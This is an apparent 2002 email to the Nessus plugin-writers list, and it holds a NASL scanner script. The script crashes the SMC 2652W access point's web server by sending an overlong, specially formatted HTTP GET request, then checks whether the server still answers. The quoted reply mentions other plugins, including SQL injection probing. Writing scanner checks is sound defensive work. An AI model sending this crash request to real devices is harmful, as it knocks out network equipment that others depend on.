Since my last 4 nasls just made it to CVS, does that mean I can send more
now? ;-)
The script below was a 0-effort jobbie and credits go to Dave Aitel's
SPIKE....
#
# Copyright 2002 by John Lampe ... j_lampe@bellsouth.net
# BUG FOUND WITH SPIKE 2.7
# See the Nessus Scripts License for details
#
if(description)
{
script_id();
script_version ("$Revision: 0.1 $");
name["english"] = "Crash SMC AP";
script_name(english:name["english"]);
desc["english"] = "
The SMC 2652W Access point web server crashes when sent a specially
formatted HTTP request. Contact vendor
for a fix
Risk factor : Medium/Low";
script_description(english:desc["english"]);
summary["english"] = "Crash SMC Access Point";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 John
Lampe...j_lampe@bellsouth.net");
family["english"] = "General";
script_family(english:family["english"]);
exit(0);
}
#
# The script code starts here
#
# found with SPIKE 2.7 http://www.immunitysec.com/spike.html
# req string directly horked from SPIKE API
port = get_kb_item("Services/www");
if(!port)port = 80;
req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif
HTTP/1.1\r\n");
req = string(req, "Referer:
http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2
i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language:
en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
soc = open_sock_tcp(port);
if (soc) {
send(socket:soc, data:req);
close(soc);
}
soc = open_sock_tcp(port);
if (!soc) {security_hole(port); exit(0); }
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc, data:req);
bling = recv(socket:soc, length:1024, timeout:5);
if (!bling) security_hole(port);
John Lampe
https://f00dikator.hn.org/ "Knowledge will forever govern ignorance, and a people who mean to be their
own governors, must arm themselves with the power knowledge gives. A popular
government without popular information or the means of acquiring it, is but
a prologue to a farce or a tragedy or perhaps both."
--James Madison
----- Original Message -----
From: "Thomas Reinke" <reinke@e-softinc.com>
To: "John Lampe" <j_lampe@bellsouth.net>
Cc: "plugins writer" <plugins-writers@list.nessus.org>; "Renaud Deraison"
<deraison@cvs.nessus.org>
Sent: Wednesday, October 09, 2002 3:23 PM
Subject: Re: Scripts
John Lampe wrote:
> 4 scripts here.
> citrix.nasl looks for citrix published applications (based on perl script
by
> ian.vitek@ixsecurity.com)
> sql_injection.nasl tries to poison cgi params (based on wpoison)
> uddi.inc is an include file for creating SOAP headers
> uddi.nasl looks for .net servers which have public web services being
> offered via uddi registry (should maybe add DISCO in the future?)
>
> John Lampe
> https://f00dikator.hn.org/
>
> "Knowledge will forever govern ignorance, and a people who mean to be
their
> own governors, must arm themselves with the power knowledge gives. A
popular
> government without popular information or the means of acquiring it, is
but
> a prologue to a farce or a tragedy or perhaps both."
> --James Madison
>
Any reason why these haven't been included in the standard
distribution of nasl scripts?
Thomas